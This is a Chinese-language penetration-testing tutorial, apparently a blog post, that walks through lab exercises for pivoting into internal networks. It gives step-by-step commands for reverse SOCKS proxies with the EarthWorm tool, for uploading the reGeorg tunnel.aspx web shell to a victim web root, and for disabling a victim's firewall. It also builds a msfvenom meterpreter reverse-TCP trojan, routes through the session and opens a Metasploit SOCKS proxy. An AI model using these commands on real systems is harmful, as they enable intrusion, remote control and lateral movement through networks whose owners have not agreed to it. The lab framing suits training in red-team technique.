赞
踩
内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket
实验1:正向代理
实验环境 :win2008 网卡一:10.1.1.1
网卡二:192.168.140.131
win2003:10.1.1.2
实验步骤:
1.将ew工具的ew_for_Win.exe程序上传到win2008服务器
2.进入ew工具的所在位置,设置代理:ew.exe -s ssocksd -l 800
3.访问受害者win2003的网页,即可访问到
4.外网想要访问受害者网页,也可通过bp添加代理,
5.之后选择刚添加的代理,直接访问内网的ip即可访问到网页的内容
6.如果想要访问远程桌面,则可利用工具proxifier添加代理服务器,即可连接
7.如果在linux上设置代理,则可在浏览器设置代理,如下图,设置完成后即可访问目标主机的网页
8.kali中也可用proxychains工具,修改其配置文件,gedit /etc/proxychains.conf,在里边添加代理
9.之后输入:proxychains rdesktop 10.1.1.2就可通过代理进行远程连接
实验二:ew高级用法反向代理
实验环境 :主机A:物理机
主机B:win2008
实验步骤:
1.先在一台具有公网ip的主机A上运行以下命令:
ew.exe -s rcsocks -l 1080 -e 8888
2.在目标主机B上启动SOCKS v5 服务 并反弹到公网主机的8888端口
ew.exe -s rssocks -d 攻击者ip -e 8888
3.在主机A上添加代理服务器,127.0.0.1:1080,即可进行远程连接
实验三:ew工具进阶—正向反弹代理
实验环境:攻击机 A:物理机
win8B:网卡一:192.168.140.131
网卡二:10.1.1.1
win3C: 网卡一:10.1.1.2
网卡二:172.16.1.1
linuxD:172.16.1.2
实验步骤:
1.关闭受害者D的防火墙:service iptables stop
2.在内网边界机C上设置端口代理:ew.exe -s ssocksd -l 8000
3.在win8上做端口转发:
ew -s lcx_tran -l 1080 -f win3受害者ip -g 8000
4.利用proxifier添加代理服务器,ip为win8B的ip,1080端口
5.之后便可进行远程访问
实验四:ew工具进阶—反向反弹代理
实验环境:攻击机A:物理机
win8B:网卡一:192.168.140.131
网卡二:10.1.1.1
win3C: 网卡一:10.1.1.2
网卡二:172.16.1.1
linuxD:172.16.1.2
实验步骤:
1.攻击机A开启监听端口:ew.exe -s lcx_listen -l 1080 -e 8888
2.内网边界机win3C将9999端口进行转发:ew.exe -s ssocksd -l 9999
3.内网边界机win8B将内网边界机win3C与攻击机连接起来:
ew -s lcx_slave -d 攻击机ip -e 8888 -f 内网边界机win3C的ip -g 9999
4.攻击机借助proxifier工具配置攻击机机器的代理:127.0.0.1:1080
5.之后便可进行远程访问
实验二:利用reGeorg工具进行反弹代理
实验环境:攻击机kali:192.168.140.137
边界机win8:192.168.140.131
10.1.1.1
受害机win3:10.1.1.2
实验步骤:
1.kali机子装上有regeo软件
2.在win2008的wwwroot目录下上传tunnel.aspx文件
3.kali命令行输入:python reGeorgSocksProxy.py -u http://192.168.140.131/tunnel.aspx,可看到开启本地的8888端口
4.修改其配置文件:gedit /etc/proxychains.conf,将其代理改为本地的8888端口
5.利用代理连接受害者机子: proxychains rdesktop 10.1.1.2,便可进行远程访问
实验三:利用msf工具进行反弹代理
、实验环境:
实验步骤:
1.选择适合的payload,此处选择 user windows/x64/meterpreter_reverse_tcp
2.制作木马
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.140.137 lport=4444 -f exe -o 1.exe
3.将木马上传到边界机win8上
4.进入管理工具:use exploit/multi/handler
5.设置paload:set payload windows/x64/meterpreter_reverse_tcp
6.配置IP:set lhost 本机ip
7.指行win8上的程序文件,并执行管理工具:exploit ,启动4444端口的监听
8.跳到后台:background,可通过sessions 1返回
9.添加路由:route 10.1.1.1 255.0.0.0 1,最后的1是代表走session 1
10.查看路由:route print
11.利用路由生成代理端口,切换模块:use auxiliary/server/socks4a(该模块是用来做代理的模块)
执行exploit -y -y是指将其放到后台去执行
12.查看监听端口情况,发现1080已经开启
13.修改配置文件,注意改为socks4
14.输入proxychains rdesktop 10.1.1.2进行远程连接
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。